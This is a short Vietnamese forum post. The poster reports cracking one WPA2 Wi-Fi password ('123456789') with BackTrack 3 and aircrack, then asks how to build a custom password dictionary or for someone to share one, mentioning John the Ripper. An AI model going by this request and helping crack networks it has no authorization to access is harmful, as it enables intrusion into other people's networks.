Bác nói đúng, em đã thử dùng BT3 crack theo cái guide của aircrack.org nhưng chỉ mới crack được 1 con WPA2 với pass là 123456789 thui, còn pass khó hơn thì cái password.lst của nó không có chứa. Nhân tiện các bác có biết cách nào để tạo cái password list theo ý mình hay bác nào có bộ từ điển xịn share cho em với. Nó hướng dẫn sử dụng cái John the ripper để tạo nhưng vào trang của nó toàn nói về unix với linux, mấy cái đó em không rành lắm :D